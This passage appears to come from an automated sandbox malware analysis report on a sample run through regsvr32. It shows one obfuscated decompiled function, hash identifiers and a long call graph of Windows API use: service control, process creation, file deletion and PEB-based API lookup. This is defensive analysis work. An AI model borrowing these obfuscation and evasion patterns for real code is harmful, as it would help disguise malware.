                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: da5534967441e997a0cbf940096504bdcb55848949444d10d0d357d809677a57
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: 581125B1D01208BFCF05EFA4D84689EBFB5EB44740F208188F9146A261D3729B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003102D8 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E003102D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t45;
				int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				void* _t75;

				_push(_a8);
				_t75 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0030C98A(_t45);
				_v12 = 0xd4268f;
				_t61 = 0x55;
				_v12 = _v12 / _t61;
				_t62 = 0x39;
				_v12 = _v12 / _t62;
				_t63 = 0x19;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x00038c24;
				_v16 = 0xae7fc4;
				_v16 = _v16 + 0x7c1;
				_v16 = _v16 ^ 0x00ac1f44;
				_v8 = 0x83f9bc;
				_v8 = _v8 ^ 0x1ab9b921;
				_v8 = _v8 | 0xa5451e1d;
				_t64 = 0x5c;
				_v8 = _v8 / _t64;
				_v8 = _v8 ^ 0x021ff71d;
				E00307F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
				_t59 = CloseHandle(_t75); // executed
				return _t59;
			}













                                                                                                                0x003102df
                                                                                                                0x003102e2
                                                                                                                0x003102e4
                                                                                                                0x003102e8
                                                                                                                0x003102e9
                                                                                                                0x003102ee
                                                                                                                0x003102ff
                                                                                                                0x00310304
                                                                                                                0x0031030c
                                                                                                                0x00310311
                                                                                                                0x00310319
                                                                                                                0x0031031e
                                                                                                                0x00310323
                                                                                                                0x0031032a
                                                                                                                0x00310331
                                                                                                                0x00310338
                                                                                                                0x0031033f
                                                                                                                0x00310346
                                                                                                                0x0031034d
                                                                                                                0x00310357
                                                                                                                0x0031035f
                                                                                                                0x00310367
                                                                                                                0x0031037b
                                                                                                                0x00310384
                                                                                                                0x0031038a

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00310384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: 601dad1bc140e16259b562960b2a5e28ac56b4e9d73fe9ef256ea501f82dfab6
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: 94114F71E01208FFEB08DFA5D80A9EEBBB5EB84310F50C09AE504AB280E7B15F119F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1037
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 5007 8e6998 5008 8d2263 GetPEB 5007->5008 5009 8e6c12 5008->5009 5020 8dbee4 5009->5020 5012 8ef5d9 2 API calls 5013 8e6c49 5012->5013 5014 8e8eb3 GetPEB 5013->5014 5015 8e6c70 5014->5015 5016 8ef94b GetPEB 5015->5016 5017 8e6c83 5016->5017 5018 8d7bc6 2 API calls 5017->5018 5019 8e6c95 5018->5019 5021 8dbefd 5020->5021 5022 8d7f78 GetPEB 5021->5022 5023 8dbf7c 5022->5023 5023->5012 5023->5019 5024 8ef7f4 5025 8ef8f9 5024->5025 5026 8ef93e 5025->5026 5027 8de4f5 2 API calls 5025->5027 5028 8ef90e 5027->5028 5032 8d9343 5028->5032 5031 8ef94b GetPEB 5031->5026 5033 8d935e 5032->5033 5035 8d94a2 5033->5035 5036 8e9635 5033->5036 5035->5031 5037 8e964e 5036->5037 5038 8d7f78 GetPEB 5037->5038 5039 8e96c5 5038->5039 5039->5033 3790 8f25d1 3795 8d50cf 3790->3795 3792 8f2661 3831 8e7b25 3792->3831 3794 8f2675 3826 8d638d 3795->3826 3797 8d6c56 4047 8dcde0 3797->4047 3800 8e8ef8 GetPEB RtlAllocateHeap 3800->3826 3803 8e34da GetPEB RtlAllocateHeap 3803->3826 3811 8e17d2 GetPEB 3811->3826 3824 8d6c46 3824->3792 3826->3797 3826->3800 3826->3803 3826->3811 3826->3824 3829 8ef94b GetPEB 3826->3829 3834 8f0e7a 3826->3834 3842 8d9af8 3826->3842 3846 8d8844 3826->3846 3856 8d9c1b 3826->3856 3869 8f13a3 3826->3869 3880 8d82d2 3826->3880 3890 8e416e 3826->3890 3904 8e8131 3826->3904 3916 8ed15e 3826->3916 3925 8efecb 3826->3925 3934 8e1a83 3826->3934 3937 8eeec2 3826->3937 3947 8d79cc 3826->3947 3951 8e8966 3826->3951 3960 8f0a01 3826->3960 3971 8e9285 3826->3971 3975 8efad1 3826->3975 3980 8da9cf 3826->3980 3989 8f26fc 3826->3989 3994 8f1fc7 3826->3994 4001 8d8ee5 3826->4001 4007 8ed4ae 3826->4007 4018 8dae33 3826->4018 4022 8e604b 3826->4022 4028 8e26f3 3826->4028 4031 8de65a 3826->4031 4038 8e3231 3826->4038 3829->3826 3832 8d7f78 GetPEB 3831->3832 3833 8e7b93 ExitProcess 3832->3833 3833->3794 3835 8f11a2 3834->3835 3838 8f12e6 3835->3838 4061 8e91cc 3835->4061 4065 8e02d8 3835->4065 4069 8ea50a 3835->4069 4073 8f0575 3835->4073 4077 8f2545 3835->4077 3838->3826 3843 8d9b12 3842->3843 3844 8d9c05 3843->3844 3845 8f1e49 GetPEB RtlAllocateHeap LoadLibraryW 3843->3845 3844->3826 3845->3843 3853 8d8b4a 3846->3853 3851 8d8c94 3854 8f0575 GetPEB 3851->3854 3853->3851 3855 8d8c92 3853->3855 4115 8d3466 3853->4115 4119 8d6e01 3853->4119 4123 8eed7b 3853->4123 4127 8d303a 3853->4127 4132 8d7761 3853->4132 3854->3855 3855->3826 3865 8da250 3856->3865 3858 8eed7b 2 API calls 3858->3865 3860 8d6e01 2 API calls 3860->3865 3861 8da4b2 3861->3826 3864 8da4b4 3866 8eed7b 2 API calls 3864->3866 3865->3858 3865->3860 3865->3861 3865->3864 3867 8d3466 2 API calls 3865->3867 4154 8d364e 3865->4154 4165 8e9862 3865->4165 4169 8ef5d9 3865->4169 4173 8dd467 3865->4173 4177 8ef94b 3865->4177 3866->3861 3867->3865 3878 8f17ea 3869->3878 3870 8f19e8 3872 8e02d8 2 API calls 3870->3872 3871 8f2545 GetPEB 3871->3878 3874 8f19e6 3872->3874 3874->3826 3875 8ea50a 2 API calls 3875->3878 3876 8ef5d9 2 API calls 3876->3878 3878->3870 3878->3871 3878->3874 3878->3875 3878->3876 3879 8ef94b GetPEB 3878->3879 4213 8eeab3 3878->4213 4217 8e8eb3 3878->4217 3879->3878 3887 8d855b 3880->3887 3881 8ef5d9 2 API calls 3881->3887 3882 8d8648 4235 8d8fe9 3882->4235 3884 8f0575 GetPEB 3884->3887 3885 8e8eb3 GetPEB 3885->3887 3886 8d8646 3886->3826 3887->3881 3887->3882 3887->3884 3887->3885 3887->3886 3888 8ef94b GetPEB 3887->3888 4221 8d4b40 3887->4221 3888->3887 3892 8e468e 3890->3892 3894 8ef5d9 2 API calls 3892->3894 3895 8e46c9 3892->3895 3896 8d303a GetPEB RtlAllocateHeap 3892->3896 3897 8e4876 3892->3897 3901 8ef94b GetPEB 3892->3901 4269 8dd2c9 3892->4269 4273 8d9291 3892->4273 4277 8e2519 3892->4277 3894->3892 3899 8e17d2 GetPEB 3895->3899 3896->3892 3897->3897 3900 8e46df 3899->3900 3902 8e17d2 GetPEB 3900->3902 3901->3892 3903 8e46f2 3902->3903 3903->3826 4281 8e1919 3904->4281 3906 8dcca2 GetPEB 3908 8e857d 3906->3908 3907 8e85ac 3911 8d4b40 2 API calls 3907->3911 3908->3906 3908->3907 3909 8ef5d9 GetPEB RtlAllocateHeap 3908->3909 3910 8e86e9 3908->3910 3912 8e8eb3 GetPEB 3908->3912 3913 8dd467 GetPEB 3908->3913 3915 8ef94b GetPEB 3908->3915 3909->3908 3910->3910 3914 8e85cb 3911->3914 3912->3908 3913->3908 3914->3826 3915->3908 3924 8ed360 3916->3924 3917 8d6e01 2 API calls 3917->3924 3919 8eed7b 2 API calls 3919->3924 3920 8ed3be 3920->3826 3921 8ed3ab 3923 8eed7b 2 API calls 3921->3923 3922 8d8e38 2 API calls 3922->3924 3923->3920 3924->3917 3924->3919 3924->3920 3924->3921 3924->3922 4284 8f267c 3924->4284 3930 8efee5 3925->3930 3927 8ef5d9 GetPEB RtlAllocateHeap 3927->3930 3929 8d3466 2 API calls 3929->3930 3930->3927 3930->3929 3931 8f0568 3930->3931 3932 8dd467 GetPEB 3930->3932 3933 8ef94b GetPEB 3930->3933 4288 8e4e54 3930->4288 4298 8f224c 3930->4298 3931->3826 3932->3930 3933->3930 3935 8d303a 2 API calls 3934->3935 3936 8e1b14 3935->3936 3936->3826 3939 8eef01 3937->3939 3941 8e25cd GetPEB 3939->3941 3943 8e17d2 GetPEB 3939->3943 3946 8ef5b4 3939->3946 4306 8e1b29 3939->4306 4318 8ee168 3939->4318 4329 8e519c 3939->4329 4347 8ebd63 3939->4347 4364 8e2b1f 3939->4364 3941->3939 3943->3939 3946->3826 3948 8d79e8 3947->3948 3949 8d7f78 GetPEB 3948->3949 3950 8d7a5b 3949->3950 3950->3826 3956 8e8c0a 3951->3956 3952 8ef5d9 2 API calls 3952->3956 3953 8e8cc1 4525 8e7098 3953->4525 3954 8e8eb3 GetPEB 3954->3956 3956->3952 3956->3953 3956->3954 3957 8e8cbf 3956->3957 3959 8ef94b GetPEB 3956->3959 4521 8d2263 3956->4521 3957->3826 3959->3956 3961 8f0a22 3960->3961 3965 8d303a 2 API calls 3961->3965 3967 8f0ddc 3961->3967 4549 8d1a5f 3961->4549 4557 8daebb 3961->4557 4580 8dd4bc 3961->4580 4600 8e6e97 3961->4600 4607 8e9a0c 3961->4607 4619 8dc151 3961->4619 4627 8d958a 3961->4627 3965->3961 3967->3826 3974 8e952d 3971->3974 3972 8e960e 3972->3826 3973 8dcca2 GetPEB 3973->3974 3974->3972 3974->3973 3978 8efbc6 3975->3978 3976 8efc88 3976->3826 3978->3976 4740 8dd3bf 3978->4740 4744 8dc0ba 3978->4744 3985 8dac19 3980->3985 3984 8dadad 3984->3826 3985->3984 3988 8e17d2 GetPEB 3985->3988 4748 8f0de9 3985->4748 4752 8e2657 3985->4752 4756 8d22f7 3985->4756 4763 8e3e11 3985->4763 4766 8d7c7a 3985->4766 3988->3985 3990 8e1919 GetPEB 3989->3990 3991 8f27a3 3990->3991 4774 8eee14 3991->4774 3996 8f21ad 3994->3996 3997 8f2212 3996->3997 3999 8d303a 2 API calls 3996->3999 4000 8f2210 3996->4000 4778 8e6d6b 3996->4778 3998 8e0231 GetPEB 3997->3998 3998->4000 3999->3996 4000->3826 4002 8d8f94 4001->4002 4003 8d303a 2 API calls 4002->4003 4004 8d8f9c 4002->4004 4006 8d8fb3 4002->4006 4003->4002 4782 8d3f5a 4004->4782 4006->3826 4014 8edc82 4007->4014 4009 8e0184 GetPEB 4009->4014 4010 8dd467 GetPEB 4010->4014 4011 8ef5d9 GetPEB RtlAllocateHeap 4011->4014 4012 8edf19 4012->3826 4014->4009 4014->4010 4014->4011 4014->4012 4015 8d3466 2 API calls 4014->4015 4016 8ef94b GetPEB 4014->4016 4815 8d3e99 4014->4815 4819 8e7a67 4014->4819 4823 8e3cbe 4014->4823 4015->4014 4016->4014 4019 8dae46 4018->4019 4020 8d7f78 GetPEB 4019->4020 4021 8daeaf 4020->4021 4021->3826 4024 8e6226 4022->4024 4026 8d2263 GetPEB 4024->4026 4027 8e6266 4024->4027 4827 8dca3c 4024->4827 4830 8e7b9e 4024->4830 4026->4024 4027->3826 4029 8d79cc GetPEB 4028->4029 4030 8e277c 4029->4030 4030->3826 4033 8de68a 4031->4033 4032 8deb20 4034 8d4e8f GetPEB 4032->4034 4033->4032 4035 8deb1e 4033->4035 4036 8d303a 2 API calls 4033->4036 4037 8d4e8f GetPEB 4033->4037 4034->4035 4035->3826 4036->4033 4037->4033 4046 8e324b 4038->4046 4040 8e343d 4042 8e17d2 GetPEB 4040->4042 4043 8e343b 4042->4043 4043->3826 4044 8d303a 2 API calls 4044->4046 4046->4040 4046->4043 4046->4044 4868 8ee5ed 4046->4868 4878 8e8cf2 4046->4878 4882 8dbdeb 4046->4882 4058 8dd14d 4047->4058 4048 8ef5d9 2 API calls 4048->4058 4050 8dd27f 4051 8d2263 GetPEB 4050->4051 4053 8dd297 4051->4053 4052 8e8eb3 GetPEB 4052->4058 4991 8d35b1 4053->4991 4056 8ef94b GetPEB 4056->4058 4057 8dd27d 4057->3824 4058->4048 4058->4050 4058->4052 4058->4056 4058->4057 4059 8ed15e 4 API calls 4058->4059 4060 8d4b40 2 API calls 4058->4060 4975 8f1a0a 4058->4975 4982 8dc4e5 4058->4982 4059->4058 4060->4058 4062 8e91ec 4061->4062 4081 8d7f78 4062->4081 4066 8e02ee 4065->4066 4067 8d7f78 GetPEB 4066->4067 4068 8e0380 CloseHandle 4067->4068 4068->3835 4070 8ea53c 4069->4070 4071 8d7f78 GetPEB 4070->4071 4072 8ea5d0 CreateFileW 4071->4072 4072->3835 4074 8f058d 4073->4074 4111 8e97b1 4074->4111 4078 8f2558 4077->4078 4079 8d7f78 GetPEB 4078->4079 4080 8f25c5 4079->4080 4080->3835 4082 8d8032 4081->4082 4086 8d8055 4081->4086 4087 8d806b 4082->4087 4084 8d8040 4090 8e66c8 4084->4090 4086->3835 4094 8d32ac GetPEB 4087->4094 4089 8d812d 4089->4084 4092 8e66ed 4090->4092 4091 8e680d 4091->4086 4092->4091 4095 8dbb14 4092->4095 4094->4089 4096 8dbce5 4095->4096 4103 8ea5eb 4096->4103 4099 8dbd2c 4101 8dbd62 4099->4101 4102 8e66c8 GetPEB 4099->4102 4101->4091 4102->4101 4104 8ea602 4103->4104 4105 8d7f78 GetPEB 4104->4105 4106 8dbd0c 4105->4106 4106->4099 4107 8d31ea 4106->4107 4108 8d3200 4107->4108 4109 8d7f78 GetPEB 4108->4109 4110 8d32a0 4109->4110 4110->4099 4112 8e97d5 4111->4112 4113 8d7f78 GetPEB 4112->4113 4114 8e9852 4113->4114 4114->3835 4116 8d348b 4115->4116 4117 8d7f78 GetPEB 4116->4117 4118 8d34f4 SHGetFolderPathW 4117->4118 4118->3853 4120 8d6e19 4119->4120 4121 8d7f78 GetPEB 4120->4121 4122 8d6ea5 OpenSCManagerW 4121->4122 4122->3853 4124 8eed91 4123->4124 4125 8d7f78 GetPEB 4124->4125 4126 8eee09 CloseServiceHandle 4125->4126 4126->3853 4139 8e345b 4127->4139 4131 8d3122 4131->3853 4138 8d78e4 4132->4138 4134 8d799d 4150 8d91f2 4134->4150 4135 8f0575 GetPEB 4135->4138 4137 8d799b 4137->3853 4138->4134 4138->4135 4138->4137 4146 8e0184 4138->4146 4140 8d7f78 GetPEB 4139->4140 4141 8d310a 4140->4141 4142 8d3506 4141->4142 4143 8d3522 4142->4143 4144 8d7f78 GetPEB 4143->4144 4145 8d359f RtlAllocateHeap 4144->4145 4145->4131 4147 8e019a 4146->4147 4148 8d7f78 GetPEB 4147->4148 4149 8e0225 4148->4149 4149->4138 4151 8d920b 4150->4151 4152 8d7f78 GetPEB 4151->4152 4153 8d9282 4152->4153 4153->4137 4156 8d3678 4154->4156 4157 8e17d2 GetPEB 4156->4157 4158 8d303a GetPEB RtlAllocateHeap 4156->4158 4161 8d3df0 4156->4161 4163 8eed7b 2 API calls 4156->4163 4181 8dcd1c 4156->4181 4185 8e640e 4156->4185 4189 8d8e38 4156->4189 4193 8d32b3 4156->4193 4197 8dcca2 4156->4197 4157->4156 4158->4156 4161->3865 4163->4156 4166 8e98a4 4165->4166 4167 8d7f78 GetPEB 4166->4167 4168 8e992e 4167->4168 4168->3865 4170 8ef5f3 4169->4170 4171 8d303a 2 API calls 4170->4171 4172 8ef6bd 4171->4172 4172->3865 4174 8dd492 4173->4174 4200 8dadb7 4174->4200 4178 8ef960 4177->4178 4203 8e17d2 4178->4203 4182 8dcd46 4181->4182 4183 8d7f78 GetPEB 4182->4183 4184 8dcdc8 4183->4184 4184->4156 4186 8e6424 4185->4186 4187 8d7f78 GetPEB 4186->4187 4188 8e64bd 4187->4188 4188->4156 4190 8d8e54 4189->4190 4191 8d7f78 GetPEB 4190->4191 4192 8d8ed4 OpenServiceW 4191->4192 4192->4156 4194 8d32ec 4193->4194 4195 8d7f78 GetPEB 4194->4195 4196 8d3397 4195->4196 4196->4156 4198 8d7f78 GetPEB 4197->4198 4199 8dcd13 4198->4199 4199->4156 4201 8d7f78 GetPEB 4200->4201 4202 8dae2c 4201->4202 4202->3865 4204 8e17e2 4203->4204 4205 8e345b GetPEB 4204->4205 4206 8e18fd 4205->4206 4209 8d6f64 4206->4209 4210 8d6f81 4209->4210 4211 8d7f78 GetPEB 4210->4211 4212 8d7002 4211->4212 4212->3865 4214 8eead4 4213->4214 4215 8d7f78 GetPEB 4214->4215 4216 8eeb4e SetFileInformationByHandle 4215->4216 4216->3878 4218 8e8ed5 4217->4218 4219 8dadb7 GetPEB 4218->4219 4220 8e8ef0 4219->4220 4220->3878 4222 8d4b5a 4221->4222 4245 8e25cd 4222->4245 4225 8e25cd GetPEB 4226 8d4dff 4225->4226 4227 8e25cd GetPEB 4226->4227 4228 8d4e15 4227->4228 4229 8d91f2 GetPEB 4228->4229 4230 8d4e30 4229->4230 4231 8d91f2 GetPEB 4230->4231 4232 8d4e4c 4231->4232 4249 8e7da0 4232->4249 4234 8d4e81 4234->3887 4236 8d9003 4235->4236 4237 8ef5d9 2 API calls 4236->4237 4238 8d91a5 4237->4238 4261 8f1c9b 4238->4261 4241 8ef94b GetPEB 4242 8d91d7 4241->4242 4265 8d7bc6 4242->4265 4244 8d91e9 4244->3886 4246 8e25e3 4245->4246 4253 8d218f 4246->4253 4250 8e7db3 4249->4250 4251 8d7f78 GetPEB 4250->4251 4252 8e7e32 SHFileOperationW 4251->4252 4252->4234 4254 8d21a7 4253->4254 4257 8d7b24 4254->4257 4258 8d7b3c 4257->4258 4259 8d7f78 GetPEB 4258->4259 4260 8d221a 4259->4260 4260->4225 4262 8f1cba 4261->4262 4263 8dadb7 GetPEB 4262->4263 4264 8d91c4 4263->4264 4264->4241 4266 8d7bd6 4265->4266 4267 8d7f78 GetPEB 4266->4267 4268 8d7c6e DeleteFileW 4267->4268 4268->4244 4270 8dd2ee 4269->4270 4271 8d7f78 GetPEB 4270->4271 4272 8dd34d 4271->4272 4272->3892 4274 8d92b3 4273->4274 4275 8d7f78 GetPEB 4274->4275 4276 8d932f 4275->4276 4276->3892 4278 8e2532 4277->4278 4279 8d7f78 GetPEB 4278->4279 4280 8e259c 4279->4280 4280->3892 4282 8d7f78 GetPEB 4281->4282 4283 8e19a8 4282->4283 4283->3908 4285 8f268c 4284->4285 4286 8d7f78 GetPEB 4285->4286 4287 8f26f0 4286->4287 4287->3924 4289 8e4e7d 4288->4289 4290 8e25cd GetPEB 4289->4290 4291 8e504f 4290->4291 4302 8d816b 4291->4302 4293 8e508e 4294 8e02d8 2 API calls 4293->4294 4297 8e5099 4293->4297 4295 8e50b6 4294->4295 4296 8e02d8 2 API calls 4295->4296 4296->4297 4297->3930 4299 8f2274 4298->4299 4300 8dadb7 GetPEB 4299->4300 4301 8f2299 4300->4301 4301->3930 4303 8d81a6 4302->4303 4304 8d7f78 GetPEB 4303->4304 4305 8d8221 CreateProcessW 4304->4305 4305->4293 4313 8e1b59 4306->4313 4307 8e23a5 4310 8e17d2 GetPEB 4307->4310 4308 8d303a 2 API calls 4308->4313 4309 8e17d2 GetPEB 4309->4313 4311 8e23a3 4310->4311 4311->3939 4313->4307 4313->4308 4313->4309 4313->4311 4373 8e7730 4313->4373 4380 8eaf0b 4313->4380 4395 8e6845 4313->4395 4399 8efd42 4313->4399 4403 8e490e 4313->4403 4321 8ee468 4318->4321 4320 8ef5d9 2 API calls 4320->4321 4321->4320 4322 8ee4a9 4321->4322 4323 8dadb7 GetPEB 4321->4323 4324 8d303a 2 API calls 4321->4324 4325 8ee5e8 4321->4325 4328 8ef94b GetPEB 4321->4328 4438 8e7e3d 4321->4438 4326 8e17d2 GetPEB 4322->4326 4323->4321 4324->4321 4325->4325 4327 8ee4b7 4326->4327 4327->3939 4328->4321 4344 8e5be0 4329->4344 4330 8d303a GetPEB RtlAllocateHeap 4330->4344 4331 8efd42 GetPEB 4331->4344 4332 8e600d 4334 8e17d2 GetPEB 4332->4334 4333 8de4f5 2 API calls 4333->4344 4336 8e5e22 4334->4336 4335 8e5db1 4449 8de4f5 4335->4449 4336->3939 4338 8ef5d9 2 API calls 4338->4344 4341 8dadb7 GetPEB 4341->4344 4344->4330 4344->4331 4344->4332 4344->4333 4344->4335 4344->4338 4344->4341 4346 8ef94b GetPEB 4344->4346 4457 8dd360 4344->4457 4345 8ef94b GetPEB 4345->4336 4346->4344 4352 8ebdce 4347->4352 4350 8ef5d9 2 API calls 4350->4352 4352->4350 4354 8e17d2 GetPEB 4352->4354 4356 8eced6 4352->4356 4357 8eece4 GetPEB 4352->4357 4359 8eceef 4352->4359 4361 8ef94b GetPEB 4352->4361 4362 8e6561 GetPEB 4352->4362 4461 8d3129 4352->4461 4465 8e3d5b 4352->4465 4469 8d8d7e 4352->4469 4473 8d6d15 4352->4473 4476 8e35a3 4352->4476 4485 8dcafe 4352->4485 4489 8e038b 4352->4489 4354->4352 4493 8eece4 4356->4493 4357->4352 4359->3939 4361->4352 4362->4352 4367 8e2b47 4364->4367 4366 8e2f8c 4369 8e17d2 GetPEB 4366->4369 4367->4366 4368 8e2f8a 4367->4368 4370 8d303a 2 API calls 4367->4370 4372 8efd42 GetPEB 4367->4372 4505 8ea916 4367->4505 4512 8edf2b 4367->4512 4368->3939 4369->4368 4370->4367 4372->4367 4379 8e775f 4373->4379 4374 8e7a3f 4375 8d4e8f GetPEB 4374->4375 4376 8e7a3d 4375->4376 4376->4313 4378 8d303a 2 API calls 4378->4379 4379->4374 4379->4376 4379->4378 4410 8d4e8f 4379->4410 4393 8eaf45 4380->4393 4381 8ebd34 4382 8e2519 GetPEB 4381->4382 4384 8ebd32 4382->4384 4383 8d303a 2 API calls 4383->4393 4384->4313 4386 8ef5d9 GetPEB RtlAllocateHeap 4386->4393 4391 8e17d2 GetPEB 4391->4393 4392 8dd2c9 GetPEB 4392->4393 4393->4381 4393->4383 4393->4384 4393->4386 4393->4391 4393->4392 4394 8ef94b GetPEB 4393->4394 4414 8efe12 4393->4414 4418 8eceff 4393->4418 4422 8d500a 4393->4422 4426 8d4f68 4393->4426 4430 8deb4b 4393->4430 4394->4393 4396 8e6858 4395->4396 4397 8efd42 GetPEB 4396->4397 4398 8e68c1 4397->4398 4398->4313 4400 8efd60 4399->4400 4434 8e6ca3 4400->4434 4404 8e4930 4403->4404 4405 8d303a 2 API calls 4404->4405 4406 8e4e35 4404->4406 4408 8e4e1e 4404->4408 4409 8e50d4 GetPEB 4404->4409 4405->4404 4407 8e17d2 GetPEB 4406->4407 4407->4408 4408->4313 4409->4404 4411 8d4ea8 4410->4411 4412 8efd42 GetPEB 4411->4412 4413 8d4f5a 4412->4413 4413->4379 4415 8efe31 4414->4415 4416 8d7f78 GetPEB 4415->4416 4417 8efeb7 4416->4417 4417->4393 4419 8ecf1e 4418->4419 4420 8d7f78 GetPEB 4419->4420 4421 8ecf8b 4420->4421 4421->4393 4423 8d503a 4422->4423 4424 8d7f78 GetPEB 4423->4424 4425 8d50b4 4424->4425 4425->4393 4427 8d4f81 4426->4427 4428 8d7f78 GetPEB 4427->4428 4429 8d4fff 4428->4429 4429->4393 4431 8deb77 4430->4431 4432 8d7f78 GetPEB 4431->4432 4433 8debfc 4432->4433 4433->4393 4435 8e6cc5 4434->4435 4436 8d7f78 GetPEB 4435->4436 4437 8e6d2a 4436->4437 4437->4313 4439 8e7e55 4438->4439 4440 8e80fc 4439->4440 4442 8e80fa 4439->4442 4444 8d303a 2 API calls 4439->4444 4445 8f1ce8 4439->4445 4443 8f1ce8 GetPEB 4440->4443 4442->4321 4443->4442 4444->4439 4446 8f1d0e 4445->4446 4447 8d7f78 GetPEB 4446->4447 4448 8f1d89 4447->4448 4448->4439 4450 8de508 4449->4450 4451 8d303a 2 API calls 4450->4451 4452 8de5ee 4451->4452 4453 8dec15 4452->4453 4454 8dec31 4453->4454 4455 8dadb7 GetPEB 4454->4455 4456 8dec4c 4455->4456 4456->4345 4458 8dd385 4457->4458 4459 8dadb7 GetPEB 4458->4459 4460 8dd3a2 4459->4460 4460->4344 4462 8d3150 4461->4462 4463 8d7f78 GetPEB 4462->4463 4464 8d31d5 4463->4464 4464->4352 4466 8e3d7e 4465->4466 4467 8d7f78 GetPEB 4466->4467 4468 8e3e01 4467->4468 4468->4352 4470 8d8db1 4469->4470 4471 8d7f78 GetPEB 4470->4471 4472 8d8e1f 4471->4472 4472->4352 4497 8e6361 4473->4497 4482 8e3831 4476->4482 4477 8e394d 4479 8e3955 4477->4479 4480 8e17d2 GetPEB 4477->4480 4479->4352 4480->4479 4481 8d303a GetPEB RtlAllocateHeap 4481->4482 4482->4477 4482->4481 4483 8efd42 GetPEB 4482->4483 4484 8e17d2 GetPEB 4482->4484 4501 8e19b1 4482->4501 4483->4482 4484->4482 4486 8dcb2d 4485->4486 4487 8d7f78 GetPEB 4486->4487 4488 8dcba6 4487->4488 4488->4352 4490 8e03ad 4489->4490 4491 8d7f78 GetPEB 4490->4491 4492 8e041d 4491->4492 4492->4352 4494 8eecfa 4493->4494 4495 8d7f78 GetPEB 4494->4495 4496 8eed6b 4495->4496 4496->4359 4498 8e6388 4497->4498 4499 8d7f78 GetPEB 4498->4499 4500 8d6dcb 4499->4500 4500->4352 4502 8e19d4 4501->4502 4503 8d7f78 GetPEB 4502->4503 4504 8e1a6e 4503->4504 4504->4482 4510 8ea945 4505->4510 4506 8f0908 GetPEB 4506->4510 4507 8eaed1 4508 8e17d2 GetPEB 4507->4508 4509 8eaecf 4508->4509 4509->4367 4510->4506 4510->4507 4510->4509 4511 8d303a 2 API calls 4510->4511 4511->4510 4515 8edf4c 4512->4515 4514 8eaf0b 2 API calls 4514->4515 4515->4514 4516 8ee15e 4515->4516 4517 8da762 4515->4517 4516->4367 4518 8da791 4517->4518 4519 8d7f78 GetPEB 4518->4519 4520 8da812 4519->4520 4520->4515 4522 8d2279 4521->4522 4523 8d7f78 GetPEB 4522->4523 4524 8d22ec 4523->4524 4524->3956 4536 8e70c6 4525->4536 4526 8e7717 4545 8d6eb4 4526->4545 4528 8e7715 4528->3957 4531 8f1c9b GetPEB 4531->4536 4532 8ef5d9 GetPEB RtlAllocateHeap 4532->4536 4533 8ef94b GetPEB 4533->4536 4534 8e8eb3 GetPEB 4534->4536 4535 8e7098 2 API calls 4535->4536 4536->4526 4536->4528 4536->4531 4536->4532 4536->4533 4536->4534 4536->4535 4537 8f27c2 4536->4537 4541 8dec5d 4536->4541 4538 8f27db 4537->4538 4539 8d7f78 GetPEB 4538->4539 4540 8f284c 4539->4540 4540->4536 4542 8dec73 4541->4542 4543 8d7f78 GetPEB 4542->4543 4544 8decfc 4543->4544 4544->4536 4546 8d6eca 4545->4546 4547 8d7f78 GetPEB 4546->4547 4548 8d6f59 4547->4548 4548->4528 4555 8d1cb1 4549->4555 4551 8d1db1 4655 8f1be6 4551->4655 4552 8d1daf 4552->3961 4555->4551 4555->4552 4638 8e3e89 4555->4638 4646 8d7013 4555->4646 4651 8e0231 4555->4651 4561 8db6c5 4557->4561 4558 8f26fc GetPEB 4558->4561 4560 8db9cb 4562 8e02d8 2 API calls 4560->4562 4561->4558 4561->4560 4564 8db94d 4561->4564 4566 8db948 4561->4566 4568 8f0575 GetPEB 4561->4568 4569 8e02d8 GetPEB CloseHandle 4561->4569 4570 8d2263 GetPEB 4561->4570 4576 8ef5d9 2 API calls 4561->4576 4577 8e8eb3 GetPEB 4561->4577 4578 8ef94b GetPEB 4561->4578 4671 8e3983 4561->4671 4679 8e9054 4561->4679 4683 8f05f6 4561->4683 4690 8d71e3 4561->4690 4700 8f131d 4561->4700 4562->4566 4565 8e4e54 3 API calls 4564->4565 4567 8db983 4565->4567 4566->3961 4567->4566 4571 8e02d8 2 API calls 4567->4571 4568->4561 4569->4561 4570->4561 4573 8db9a8 4571->4573 4575 8e02d8 2 API calls 4573->4575 4575->4566 4576->4561 4577->4561 4578->4561 